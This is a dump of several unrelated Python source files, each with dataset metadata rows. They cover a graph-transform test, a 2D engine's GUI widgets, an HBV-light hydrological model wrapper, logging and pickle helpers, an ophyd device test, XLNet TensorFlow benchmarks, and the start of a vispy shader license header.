], update_attributes=update_attrs, nodes_with_edges_only=True)
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
def test_interpolate_tf_style_concat(self):
graph = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect('out_shape', '1:interpolate'),
*connect('interpolate', '0:concat'),
*connect('N', '1:concat'),
*connect('concat', 'output'),
], update_attributes={'concat': {'N': 1}}, nodes_with_edges_only=True)
graph_ref = graph.copy()
InterpolateWithConcat().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
| 45.175141
| 120
| 0.613057
|
544ba8d98f7b58f7dedf98f8e8746522d8285a52
| 5,419
|
py
|
Python
|
Drago2Dengine/__versions__/win32/raw/__core__/__widgets__.py
|
DragoNext/Drago-2D-Engine
|
d740186d8a1807127bff3d351df152ccadbaba09
|
[
"MIT"
] | null | null | null |
Drago2Dengine/__versions__/win32/raw/__core__/__widgets__.py
|
DragoNext/Drago-2D-Engine
|
d740186d8a1807127bff3d351df152ccadbaba09
|
[
"MIT"
] | null | null | null |
Drago2Dengine/__versions__/win32/raw/__core__/__widgets__.py
|
DragoNext/Drago-2D-Engine
|
d740186d8a1807127bff3d351df152ccadbaba09
|
[
"MIT"
] | null | null | null |
class D2DWidgets:
def __init__(self,D2DOBJ,EVMANAGER):
"""Widgets :D"""
self.D2D = D2DOBJ
self.EVENT_MANAGER = EVMANAGER
self.WIDGETS = []
# _std standard events for widgets :3
def _std_x(self,*ALL_VARIABLESIN):
''' Example
ARGS = [but, BUTTON_XY, BUTTON_SIZE, BUTTON_COLOR, BUTTON_TEXTUREID, ON_HOVER,ON_HOVER_RETRACT, HOVER_DELAY, ON_CLICK, ON_CLICK_RETRACT, CLICK_DELAY, COMMAND]
'''
def _std_darken(self,widget):
widget = widget[0]
self.D2D.edit_color(widget[0],
[max(0,widget[3][0]-0.1), max(0,widget[3][1]-0.1),
max(0,widget[3][2]-0.1), max(0,widget[3][3])])
def _std_lighten(self,widget):
widget = widget[0]
        # clamp each channel at 1.0 when lightening (min, not max, otherwise
        # every channel would be forced up to at least 1.0)
        self.D2D.edit_color(widget[0],
            [min(1, widget[3][0]+0.1), min(1, widget[3][1]+0.1),
             min(1, widget[3][2]+0.1), min(1, widget[3][3])])
def _std_out(self,widget):
pass
def _std_hoverback_color(self,widget):
widget = widget[0]
self.D2D.edit_color(widget[0], [ widget[3][0], widget[3][1], widget[3][2], widget[3][3]])
def _std_clickback_color(self,widget):
widget = widget[0]
self.D2D.edit_color(widget[0], [ widget[3][0], widget[3][1], widget[3][2], widget[3][3]])
widget[-1](widget)
def _hover_dropbox(self,widget):
main_widget = widget[0][0]
xy = main_widget[1]
size = main_widget[2]
sub_widgets = []
for i in widget[0][1:]:
sub_widgets.append(i[0])
r = 0
for i in sub_widgets:
self.D2D.edit_pos(i,[xy[0],xy[1]+size[1]+r],size)
r+=+size[1]
def _inv_hover_dropbox(self,widget):
main_widget = widget[0][0]
xy = main_widget[1]
size = main_widget[2]
sub_widgets = []
for i in widget[0][1:]:
sub_widgets.append(i[0])
for i in sub_widgets:
self.D2D.edit_pos(i,[0,0],[0,0])
def create_dropbox(self,DROP_XY=[0,0],DROP_SIZE=[0,0],DROP_COLOR=[1,0,0,1],DROP_FONT=None,DROP_TEXTUREID=0,
DROPSHOW_HOVER=True,
ENTRIES = [],
ON_HOVER=None,ON_HOVER_RETRACT=None,HOVER_DELAY=100,
ON_CLICK=None,ON_CLICK_RETRACT=None,CLICK_DELAY=100,
COMMAND=None):
drp = self.D2D.create_quad(DROP_XY,DROP_SIZE,DROP_COLOR,DROP_TEXTUREID)
self.WIDGETS.append([drp,DROP_XY,DROP_SIZE,DROP_COLOR])
ARGS = [[drp,DROP_XY,DROP_SIZE],]
if len(ENTRIES) > 1:
for i in ENTRIES:
aew = self.D2D.create_quad([0,0],[0,0],DROP_COLOR,DROP_TEXTUREID)
ARGS.append([aew])
else:
pass
if DROPSHOW_HOVER == True:
pass # Show it
self.EVENT_MANAGER.add_event('Motion',[DROP_XY[0],DROP_XY[1],DROP_XY[0]+DROP_SIZE[0],DROP_XY[1]+DROP_SIZE[1]],
(self._hover_dropbox,ARGS),
(self._inv_hover_dropbox,ARGS)
,HOVER_DELAY)
else:
pass # show it when clicked
def create_button(self,BUTTON_XY=[0,0],BUTTON_SIZE=[0,0],BUTTON_COLOR=[1,0,0,1],BUTTON_TEXTUREID=0,
ON_HOVER=None,ON_HOVER_RETRACT=None,HOVER_DELAY=100,
ON_CLICK=None,ON_CLICK_RETRACT=None,CLICK_DELAY=100,
COMMAND=None,
TEXT=None,TEXT_FONT=None):
but = self.D2D.create_quad(BUTTON_XY,BUTTON_SIZE,BUTTON_COLOR,BUTTON_TEXTUREID)
if TEXT != None:
if TEXT_FONT != None:
pass
            else:print('Text "'+TEXT+'" is specified but TEXT_FONT is None; please specify a font.')
self.WIDGETS.append([but,BUTTON_XY,BUTTON_SIZE,BUTTON_COLOR])
if ON_CLICK == None:
ON_CLICK = self._std_darken
elif ON_CLICK == 'light':
ON_CLICK = self._std_lighten
elif ON_CLICK == 'darken':
ON_CLICK = self._std_darken
        else: pass  # ON_CLICK is a custom callable; if it is not callable, invoking it later will raise a TypeError.
if ON_HOVER == None:
ON_HOVER = self._std_darken
elif ON_HOVER == 'light':
ON_HOVER = self._std_lighten
elif ON_HOVER == 'darken':
ON_HOVER = self._std_darken
else:pass
if ON_CLICK_RETRACT == None:
ON_CLICK_RETRACT = self._std_clickback_color
if ON_HOVER_RETRACT == None:
ON_HOVER_RETRACT = self._std_hoverback_color
if COMMAND == None:
COMMAND = self._std_out
ARGS = [but, BUTTON_XY, BUTTON_SIZE, BUTTON_COLOR, BUTTON_TEXTUREID, ON_HOVER,ON_HOVER_RETRACT, HOVER_DELAY, ON_CLICK, ON_CLICK_RETRACT, CLICK_DELAY, COMMAND]
# Hover
self.EVENT_MANAGER.add_event('Motion',[BUTTON_XY[0],BUTTON_XY[1],BUTTON_XY[0]+BUTTON_SIZE[0],BUTTON_XY[1]+BUTTON_SIZE[1]],
(ON_HOVER,ARGS),
(ON_HOVER_RETRACT,ARGS)
,HOVER_DELAY)
# Click
self.EVENT_MANAGER.add_event('LeftClick',[BUTTON_XY[0],BUTTON_XY[1],BUTTON_XY[0]+BUTTON_SIZE[0],BUTTON_XY[1]+BUTTON_SIZE[1]],
(ON_CLICK,ARGS),
(ON_CLICK_RETRACT,ARGS)
,CLICK_DELAY)
# Command
| 34.297468
| 166
| 0.567448
|
cadea28ff7367d4fa75e3181feeddcf44516bbce
| 8,467
|
py
|
Python
|
hbvpy/core/model.py
|
GironsLopez/hbvpy
|
c90241a444f2d111358234f42982cd573ff3c7bd
|
[
"BSD-3-Clause"
] | 1
|
2022-01-11T12:13:31.000Z
|
2022-01-11T12:13:31.000Z
|
hbvpy/core/model.py
|
GironsLopez/hbvpy
|
c90241a444f2d111358234f42982cd573ff3c7bd
|
[
"BSD-3-Clause"
] | null | null | null |
hbvpy/core/model.py
|
GironsLopez/hbvpy
|
c90241a444f2d111358234f42982cd573ff3c7bd
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
hbvpy.model
===========
**A package to run the command line version of HBV-light.**
This package is intended to provide bindings to the command line version of
HBV-light so the model can be run from a python script.
.. author:: Marc Girons Lopez
"""
import os
import subprocess
from hbvpy.ThirdParty import AnimatedProgressBar
__all__ = ['HBVcatchment', 'HBVsimulation']
class HBV(object):
"""
    Set up the command line version of HBV-light (HBV-light-CLI.exe).
Attributes
----------
hbv_path : str, optional
Non-default HBV-light-CLI.exe path, default is None.
Raises
------
ValueError
If the specified path to the HBV-light-CLI.exe file does not exist.
"""
def __init__(self, hbv_path=None):
if hbv_path is None:
self.hbv_path = (
'C:\\Program Files (x86)\\HBV-light\\HBV-light-CLI.exe')
else:
self.hbv_path = hbv_path
if not os.path.exists(self.hbv_path):
raise ValueError(
                'The specified HBV-light-CLI.exe file does not exist.')
class HBVsimulation(HBV):
"""
HBV-light simulation setup.
This class defines the input data and configuration files for setting up
a particular simulation setup.
HBV-light will search for the default files in the data directory and use
them if they are present. If the user decides not to use a specific file
(that is located in the data directory with a default name), the str
'dummy.txt' should be passed to the corresponding attribute.
Attributes
----------
hbv_path : str, optional
Non-default HBV-light-CLI.exe path, default is None.
c : str, optional
File with catchment settings, default is 'Clarea.xml'.
p : str, optional
File with parameter settings, default is 'Parameter.xml'.
s : str, optional
File with simulation settings, default is 'Simulation.xml'.
ptq : str, optional
File with daily precipitation, temperature and discharge values,
default is 'ptq.txt'.
evap : str, optional
File with potential evaporation values, default is 'EVAP.txt'.
tmean : str, optional
File with long-term mean temperature values, default is 'T_mean.txt'.
ptcalt : str, optional
File with daily temperature and/or precipitation gradients,
        default is 'PTCALT.txt'.
sc : str, optional
File describing the spatial relation between different subcatchments,
default is 'SubCatchment.txt'.
b : str, optional
File with parameter sets for batch simulation, default is 'Batch.txt'.
ps : str, optional
File with precipitation series, default is 'P_series.txt'.
ts : str, optional
File with temperature series, default is 'T_series.txt'.
es : str, optional
File with evaporation series, default is 'EVAP_series.txt'.
bs : str, optional
File with batch simulation settings, default is 'Batch_Simulation.txt'.
mcs : str, optional
File with Monte Carlo simulation settings,
default is 'MC_Simulation.txt'.
gaps : str, optional
File with GAP simulation settings, default is 'GAP_Simulation.txt'.
results : str, optional
Results output folder, default is 'Results'.
summary : str, optional
Summary output file, default is 'Summary.txt'.
g : str, optional
Glacier profile file, default is 'GlacierProfile.txt'.
swe : str, optional
File with snow water equivalent data, default is 'ObsSWE.txt'.
    snowcover : str, optional
File with snow cover data, default is 'SnowCover.txt'.
python : str, optional
Python objective function file, default is 'ObjFunc.py'.
"""
def __init__(
self, hbv_path=None, c='Clarea.xml', p='Parameter.xml',
s='Simulation.xml', ptq='ptq.txt', evap='EVAP.txt',
tmean='T_mean.txt', ptcalt='PTCALT.txt', sc='SubCatchment.txt',
b='Batch.txt', ps='P_series.txt', ts='T_series.txt',
es='EVAP_series.txt', bs='Batch_Simulation.txt',
mcs='MC_Simulation.txt', gaps='GAP_Simulation.txt',
results='Results', summary='Summary.txt', g='GlacierProfile.txt',
swe='ObsSWE.txt', snowcover='SnowCover.txt', python='ObjFunc.py'):
super().__init__(hbv_path)
self.results_folder = results
self.files = {
'c': c, 'p': p, 's': s, 'ptq': ptq, 'evap': evap,
'tmean': tmean, 'ptcalt': ptcalt, 'sc': sc, 'b': b, 'ps': ps,
'ts': ts, 'es': es, 'bs': bs, 'mcs': mcs, 'gaps': gaps,
'summary': summary, 'g': g, 'swe': swe, 'snowcover': snowcover,
'python': python}
class HBVcatchment(HBVsimulation):
"""
HBV-light catchment.
This class defines the catchment folder for HBV-light and provides
methods to run the model and show the progress.
Attributes
----------
bsn_dir : str
Path to the basin folder (containing a 'Data' sub-folder).
simulation : hbvpy.model.Scenario instance
Predefined HBV-light simulation setup to run for the chosen catchment.
"""
def __init__(self, bsn_dir, simulation):
"""
"""
self.__simulation = simulation
self.bsn_dir = bsn_dir
self.basin_name = os.path.relpath(bsn_dir, bsn_dir + '..')
if not os.path.exists(self.bsn_dir + self.results_folder):
os.makedirs(self.bsn_dir + self.results_folder)
def __getattr__(self, attr):
"""
"""
return getattr(self.__simulation, attr)
def __setattr__(self, attr, val):
"""
"""
if attr == '_HBVcatchment__simulation':
object.__setattr__(self, attr, val)
return setattr(self.__simulation, attr, val)
def _parse_files(self, command):
"""
Parse the necessary files to run HBV-light.
Parameters
----------
command : list
List of arguments needed to run HBV-light.
Returns
-------
command : list
List of arguments and files needed to run HBV-light.
"""
for name, file in self.files.items():
if file is None:
continue
else:
command.append('/' + name + ':' + file)
return command
def _print_progress(self, sim_type, process, debug_mode=False):
"""
Print the run progress of HBV-light.
Parameters
----------
sim_type : str
Simulation type.
process : Subprocess.process
Process to run the HBV model.
debug_mode : bool, optional
Choose whether to show the full HBV-light messages on the
command line, default is False.
"""
print('\nProcessing: ' + str(sim_type) +
' | Catchment: ' + str(self.basin_name))
if debug_mode is True:
while True:
line = process.stdout.readline()
if not line:
break
print(line)
else:
p = AnimatedProgressBar(end=100, width=50)
while True:
line = process.stdout.readline()
if not line:
break
p + 1
p.show_progress()
            print()
def run(self, sim_type, debug_mode=False):
"""
Run HBV-light.
NOTE: Each simulation type (sim_type) requires specific configuration
files. Please refer to the documentation of HBV-light for information
on the different simulation types and required files.
Parameters
----------
sim_type : {'SingleRun', 'MonteCarloRun', 'BatchRun', 'GAPRun'}
Simulation type.
debug_mode : bool, optional
If False a progress bar is shown, otherwise the standard
HBV-light output is shown, default is False.
"""
command = [
self.hbv_path, 'Run', self.bsn_dir,
sim_type, self.results_folder]
command = self._parse_files(command)
process = subprocess.Popen(
command, stdout=subprocess.PIPE, universal_newlines=True)
self._print_progress(sim_type, process, debug_mode=debug_mode)
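# Illustrative usage sketch (not part of the original module): the basin path below is
# hypothetical and HBV-light-CLI.exe must be installed for the call to succeed; see the
# HBVsimulation and HBVcatchment docstrings above for the meaning of the inputs.
if __name__ == '__main__':
    simulation = HBVsimulation()                    # default input file names and CLI path
    catchment = HBVcatchment('C:\\HBV\\MyBasin\\', simulation)
    catchment.run('SingleRun')                      # or 'BatchRun', 'MonteCarloRun', 'GAPRun'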
| 31.830827
| 79
| 0.597969
|
26844ef34e134cc54a2ff8da5875198bd488add7
| 4,230
|
py
|
Python
|
PythonLinearNonlinearControl/helper.py
|
Geonhee-LEE/PythonLinearNonlinearControl
|
2a2467098108641483778c09ceb7906cb49f6cee
|
[
"MIT"
] | 425
|
2020-03-31T07:17:48.000Z
|
2022-03-30T09:44:41.000Z
|
PythonLinearNonlinearControl/helper.py
|
Geonhee-LEE/PythonLinearNonlinearControl
|
2a2467098108641483778c09ceb7906cb49f6cee
|
[
"MIT"
] | 6
|
2020-06-22T23:50:41.000Z
|
2021-11-19T08:48:35.000Z
|
PythonLinearNonlinearControl/helper.py
|
Geonhee-LEE/PythonLinearNonlinearControl
|
2a2467098108641483778c09ceb7906cb49f6cee
|
[
"MIT"
] | 88
|
2020-04-03T12:58:54.000Z
|
2022-03-28T07:01:22.000Z
|
import argparse
import datetime
import json
import os
import sys
import six
import pickle
from logging import DEBUG, basicConfig, getLogger, FileHandler, StreamHandler, Formatter, Logger
def make_logger(save_dir):
"""
Args:
save_dir (str): save directory
"""
# base config setting
basicConfig(
format='[%(asctime)s] %(name)s %(levelname)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S'
)
# mypackage log level
logger = getLogger("PythonLinearNonlinearControl")
logger.setLevel(DEBUG)
# file handler
log_path = os.path.join(save_dir, "log.txt")
file_handler = FileHandler(log_path)
file_handler.setLevel(DEBUG)
file_handler.setFormatter(Formatter('%(message)s'))
logger.addHandler(file_handler)
# sh handler
# sh_handler = StreamHandler()
# logger.addHandler(sh_handler)
def int_tuple(s):
""" transform str to tuple
Args:
s (str): strings that you want to change
Returns:
tuple
"""
return tuple(int(i) for i in s.split(','))
def bool_flag(s):
""" transform str to bool flg
Args:
s (str): strings that you want to change
"""
if s == '1':
return True
elif s == '0':
return False
msg = 'Invalid value "%s" for bool flag (should be 0 or 1)'
raise ValueError(msg % s)
def file_exists(path):
""" Check file existence on given path
Args:
path (str): path of the file to check existence
Returns:
file_existence (bool): True if file exists otherwise False
"""
return os.path.exists(path)
def create_dir_if_not_exist(outdir):
""" Check directory existence and creates new directory if not exist
Args:
outdir (str): path of the file to create directory
RuntimeError:
file exists in outdir but it is not a directory
"""
if file_exists(outdir):
if not os.path.isdir(outdir):
raise RuntimeError('{} is not a directory'.format(outdir))
else:
return
os.makedirs(outdir)
def write_text_to_file(file_path, data):
""" Write given text data to file
Args:
file_path (str): path of the file to write data
data (str): text to write to the file
"""
with open(file_path, 'w') as f:
f.write(data)
def read_text_from_file(file_path):
""" Read given file as text
Args:
file_path (str): path of the file to read data
Returns
data (str): text read from the file
"""
with open(file_path, 'r') as f:
return f.read()
def save_pickle(file_path, data):
""" pickle given data to file
Args:
file_path (str): path of the file to pickle data
data (): data to pickle
"""
with open(file_path, 'wb') as f:
pickle.dump(data, f)
def load_pickle(file_path):
""" load pickled data from file
Args:
file_path (str): path of the file to load pickled data
Returns:
data (): data pickled in file
"""
with open(file_path, 'rb') as f:
if six.PY2:
return pickle.load(f)
else:
return pickle.load(f, encoding='bytes')
def prepare_output_dir(base_dir, args, time_format='%Y-%m-%d-%H%M%S'):
""" prepare a directory with current datetime as name.
created directory contains the command and args when the script was called as text file.
Args:
base_dir (str): path of the directory to save data
args (dict): arguments when the python script was called
time_format (str): datetime format string for naming directory to save data
Returns:
out_dir (str): directory to save data
"""
time_str = datetime.datetime.now().strftime(time_format)
outdir = os.path.join(base_dir, time_str)
create_dir_if_not_exist(outdir)
# Save all the arguments
args_file_path = os.path.join(outdir, 'args.txt')
if isinstance(args, argparse.Namespace):
args = vars(args)
write_text_to_file(args_file_path, json.dumps(args))
# Save the command
argv_file_path = os.path.join(outdir, 'command.txt')
argv = ' '.join(sys.argv)
write_text_to_file(argv_file_path, argv)
return outdir
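# Illustrative usage sketch: wires the argparse helpers above into a parser and prepares
# an output directory with logging. The argument names and the './result' base directory
# are hypothetical placeholders.
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--state-size', type=int_tuple, default='2,1')   # parsed to (2, 1)
    parser.add_argument('--render', type=bool_flag, default='0')         # parsed to False
    parsed = parser.parse_args([])
    out_dir = prepare_output_dir('./result', parsed)  # ./result/<timestamp>/ with args.txt and command.txt
    make_logger(out_dir)                              # adds ./result/<timestamp>/log.txt as a log handler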
| 26.772152
| 96
| 0.633806
|
3a62b6ca919a5256599f3facf3e7fe9db3c483b9
| 1,034
|
py
|
Python
|
pcdsdevices/tests/test_disconnected.py
|
ghalym/pcdsdevices
|
0427e1b92b10e305bdd29cd3a968ce913bae60aa
|
[
"BSD-3-Clause-LBNL"
] | 3
|
2019-06-17T20:08:54.000Z
|
2022-01-11T17:55:21.000Z
|
pcdsdevices/tests/test_disconnected.py
|
ghalym/pcdsdevices
|
0427e1b92b10e305bdd29cd3a968ce913bae60aa
|
[
"BSD-3-Clause-LBNL"
] | 757
|
2017-12-21T23:16:41.000Z
|
2022-03-31T22:56:06.000Z
|
pcdsdevices/tests/test_disconnected.py
|
ghalym/pcdsdevices
|
0427e1b92b10e305bdd29cd3a968ce913bae60aa
|
[
"BSD-3-Clause-LBNL"
] | 38
|
2018-01-26T00:01:35.000Z
|
2022-02-17T00:48:55.000Z
|
import pytest
from ophyd.device import Component as Cpt
from ophyd.device import Device
from ophyd.signal import EpicsSignal
class Disconnected(Device):
sig01 = Cpt(EpicsSignal, '01')
sig02 = Cpt(EpicsSignal, '02')
sig03 = Cpt(EpicsSignal, '03')
sig04 = Cpt(EpicsSignal, '04')
sig05 = Cpt(EpicsSignal, '05')
sig06 = Cpt(EpicsSignal, '06')
sig07 = Cpt(EpicsSignal, '07')
sig08 = Cpt(EpicsSignal, '08')
sig09 = Cpt(EpicsSignal, '09')
sig10 = Cpt(EpicsSignal, '10')
sig11 = Cpt(EpicsSignal, '11')
sig12 = Cpt(EpicsSignal, '12')
sig13 = Cpt(EpicsSignal, '13')
sig14 = Cpt(EpicsSignal, '14')
sig15 = Cpt(EpicsSignal, '15')
sig16 = Cpt(EpicsSignal, '16')
sig17 = Cpt(EpicsSignal, '17')
sig18 = Cpt(EpicsSignal, '18')
sig19 = Cpt(EpicsSignal, '19')
sig20 = Cpt(EpicsSignal, '20')
@pytest.mark.timeout(5)
def test_instantiate_disconnected():
"""Check if environment handles disconnected devices gracefully"""
Disconnected('NO:CONN:', name='no_conn')
| 30.411765
| 70
| 0.659574
|
d9e7c04cfe349f0e1b0ca3c9115322f9d71b1450
| 7,517
|
py
|
Python
|
official/benchmark/xlnet_benchmark.py
|
zcdzcdzcd/models
|
a31b526a7617a152a138a865b5689bf5b59f655d
|
[
"Apache-2.0"
] | 12
|
2020-12-13T08:34:24.000Z
|
2022-03-20T15:17:17.000Z
|
official/benchmark/xlnet_benchmark.py
|
zcdzcdzcd/models
|
a31b526a7617a152a138a865b5689bf5b59f655d
|
[
"Apache-2.0"
] | 10
|
2019-12-28T21:31:19.000Z
|
2020-04-12T20:01:58.000Z
|
official/benchmark/xlnet_benchmark.py
|
zcdzcdzcd/models
|
a31b526a7617a152a138a865b5689bf5b59f655d
|
[
"Apache-2.0"
] | 8
|
2020-04-12T04:30:33.000Z
|
2021-09-17T20:54:44.000Z
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Executes XLNet benchmarks and accuracy tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
import time
# pylint: disable=g-bad-import-order
from absl import flags
from absl.testing import flagsaver
import tensorflow as tf
# pylint: enable=g-bad-import-order
from official.benchmark import bert_benchmark_utils as benchmark_utils
from official.nlp.xlnet import run_classifier
from official.nlp.xlnet import run_squad
from official.utils.testing import benchmark_wrappers
# pylint: disable=line-too-long
PRETRAINED_CHECKPOINT_PATH = 'gs://cloud-tpu-checkpoints/xlnet/large/xlnet_model-1'
CLASSIFIER_TRAIN_DATA_PATH = 'gs://tf-perfzero-data/xlnet/imdb/spiece.model.len-512.train.tf_record'
CLASSIFIER_EVAL_DATA_PATH = 'gs://tf-perfzero-data/xlnet/imdb/spiece.model.len-512.dev.eval.tf_record'
SQUAD_DATA_PATH = 'gs://tf-perfzero-data/xlnet/squadv2_cased/'
# pylint: enable=line-too-long
FLAGS = flags.FLAGS
class XLNetBenchmarkBase(benchmark_utils.BertBenchmarkBase):
"""Base class to hold methods common to test classes in the module."""
def __init__(self, output_dir=None):
super(XLNetBenchmarkBase, self).__init__(output_dir)
self.num_epochs = None
self.num_steps_per_epoch = None
@flagsaver.flagsaver
def _run_xlnet_classifier(self):
"""Starts XLNet classification task."""
run_classifier.main(unused_argv=None)
@flagsaver.flagsaver
def _run_xlnet_squad(self):
"""Starts XLNet classification task."""
run_squad.main(unused_argv=None)
class XLNetClassifyAccuracy(XLNetBenchmarkBase):
"""Short accuracy test for XLNet classifier model.
Tests XLNet classification task model accuracy. The naming
convention of below test cases follow
`benchmark_(number of gpus)_gpu_(dataset type)` format.
"""
def __init__(self, output_dir=None, **kwargs):
self.train_data_path = CLASSIFIER_TRAIN_DATA_PATH
self.eval_data_path = CLASSIFIER_EVAL_DATA_PATH
self.pretrained_checkpoint_path = PRETRAINED_CHECKPOINT_PATH
super(XLNetClassifyAccuracy, self).__init__(output_dir=output_dir)
@benchmark_wrappers.enable_runtime_flags
def _run_and_report_benchmark(self,
training_summary_path,
min_accuracy=0.95,
max_accuracy=0.97):
"""Starts XLNet accuracy benchmark test."""
start_time_sec = time.time()
self._run_xlnet_classifier()
wall_time_sec = time.time() - start_time_sec
with tf.io.gfile.GFile(training_summary_path, 'rb') as reader:
summary = json.loads(reader.read().decode('utf-8'))
super(XLNetClassifyAccuracy, self)._report_benchmark(
stats=summary,
wall_time_sec=wall_time_sec,
min_accuracy=min_accuracy,
max_accuracy=max_accuracy)
def _setup(self):
super(XLNetClassifyAccuracy, self)._setup()
FLAGS.test_data_size = 25024
FLAGS.train_batch_size = 16
FLAGS.seq_len = 512
FLAGS.mem_len = 0
FLAGS.n_layer = 24
FLAGS.d_model = 1024
FLAGS.d_embed = 1024
FLAGS.n_head = 16
FLAGS.d_head = 64
FLAGS.d_inner = 4096
FLAGS.untie_r = True
FLAGS.n_class = 2
FLAGS.ff_activation = 'gelu'
FLAGS.strategy_type = 'mirror'
FLAGS.learning_rate = 2e-5
FLAGS.train_steps = 4000
FLAGS.warmup_steps = 500
FLAGS.iterations = 200
FLAGS.bi_data = False
FLAGS.init_checkpoint = self.pretrained_checkpoint_path
FLAGS.train_tfrecord_path = self.train_data_path
FLAGS.test_tfrecord_path = self.eval_data_path
def benchmark_8_gpu_imdb(self):
"""Run XLNet model accuracy test with 8 GPUs."""
self._setup()
FLAGS.model_dir = self._get_model_dir('benchmark_8_gpu_imdb')
# Sets timer_callback to None as we do not use it now.
self.timer_callback = None
summary_path = os.path.join(FLAGS.model_dir,
'summaries/training_summary.txt')
self._run_and_report_benchmark(summary_path)
class XLNetSquadAccuracy(XLNetBenchmarkBase):
"""Short accuracy test for XLNet squad model.
Tests XLNet squad task model accuracy. The naming
convention of below test cases follow
`benchmark_(number of gpus)_gpu_(dataset type)` format.
"""
def __init__(self, output_dir=None, **kwargs):
self.train_data_path = SQUAD_DATA_PATH
self.predict_file = os.path.join(SQUAD_DATA_PATH, "dev-v2.0.json")
self.test_data_path = os.path.join(SQUAD_DATA_PATH, "12048.eval.tf_record")
self.spiece_model_file = os.path.join(SQUAD_DATA_PATH, "spiece.cased.model")
self.pretrained_checkpoint_path = PRETRAINED_CHECKPOINT_PATH
super(XLNetSquadAccuracy, self).__init__(output_dir=output_dir)
@benchmark_wrappers.enable_runtime_flags
def _run_and_report_benchmark(self,
training_summary_path,
min_accuracy=87.0,
max_accuracy=89.0):
"""Starts XLNet accuracy benchmark test."""
start_time_sec = time.time()
self._run_xlnet_squad()
wall_time_sec = time.time() - start_time_sec
with tf.io.gfile.GFile(training_summary_path, 'rb') as reader:
summary = json.loads(reader.read().decode('utf-8'))
super(XLNetSquadAccuracy, self)._report_benchmark(
stats=summary,
wall_time_sec=wall_time_sec,
min_accuracy=min_accuracy,
max_accuracy=max_accuracy)
def _setup(self):
super(XLNetSquadAccuracy, self)._setup()
FLAGS.train_batch_size = 16
FLAGS.seq_len = 512
FLAGS.mem_len = 0
FLAGS.n_layer = 24
FLAGS.d_model = 1024
FLAGS.d_embed = 1024
FLAGS.n_head = 16
FLAGS.d_head = 64
FLAGS.d_inner = 4096
FLAGS.untie_r = True
FLAGS.ff_activation = 'gelu'
FLAGS.strategy_type = 'mirror'
FLAGS.learning_rate = 3e-5
FLAGS.train_steps = 8000
FLAGS.warmup_steps = 1000
FLAGS.iterations = 1000
FLAGS.bi_data = False
FLAGS.init_checkpoint = self.pretrained_checkpoint_path
FLAGS.train_tfrecord_path = self.train_data_path
FLAGS.test_tfrecord_path = self.test_data_path
FLAGS.spiece_model_file = self.spiece_model_file
FLAGS.predict_file = self.predict_file
FLAGS.adam_epsilon=1e-6
FLAGS.lr_layer_decay_rate=0.75
def benchmark_8_gpu_squadv2(self):
"""Run XLNet model squad v2 accuracy test with 8 GPUs."""
self._setup()
FLAGS.model_dir = self._get_model_dir('benchmark_8_gpu_squadv2')
FLAGS.predict_dir = FLAGS.model_dir
# Sets timer_callback to None as we do not use it now.
self.timer_callback = None
summary_path = os.path.join(FLAGS.model_dir,
'summaries/training_summary.txt')
self._run_and_report_benchmark(summary_path)
if __name__ == '__main__':
tf.test.main()
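# Usage note (illustrative, not from the original file): these classes are normally
# discovered and driven by TensorFlow's benchmark harness. A single accuracy test can
# also be invoked directly, e.g.
#   XLNetClassifyAccuracy(output_dir='/tmp/xlnet_benchmark').benchmark_8_gpu_imdb()
# where the output_dir value is a placeholder and the GCS data paths defined above must
# be reachable from the machine running the benchmark.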
| 34.640553
| 102
| 0.715977
|
95522d862c784d36605c5cc196a9f2b4fb329196
| 10,862
|
py
|
Python
|
glue_vispy_viewers/volume/shaders.py
|
glue-viz/glue-vispy-viewer
|
7ce0c55989eee9dc4056e5ce1547591cbaab86b6
|
[
"BSD-2-Clause"
] | 19
|
2016-05-26T15:05:50.000Z
|
2021-12-02T10:48:30.000Z
|
glue_vispy_viewers/volume/shaders.py
|
Carifio24/glue-vispy-viewers
|
7ce0c55989eee9dc4056e5ce1547591cbaab86b6
|
[
"BSD-2-Clause"
] | 183
|
2016-05-05T10:38:56.000Z
|
2021-10-17T21:32:45.000Z
|
glue_vispy_viewers/volume/shaders.py
|
PennyQ/astro-vispy
|
7ce0c55989eee9dc4056e5ce1547591cbaab86b6
|
[
"BSD-2-Clause"
] | 15
|
2016-08-27T12:09:31.000Z
|
2021-11-07T18:52:54.000Z
|
# This file implements a fragment shader that can be used to visualize multiple
# volumes simultaneously. It is derived from the original fragment shader in
# vispy.visuals.volume, which is released under a BSD license included here:
#
# ===========================================================================
# Vispy is licensed under the terms of the (new) BSD license:
#
# Copyright (c) 2015, authors of Vispy
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Vispy Development Team nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER
# OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
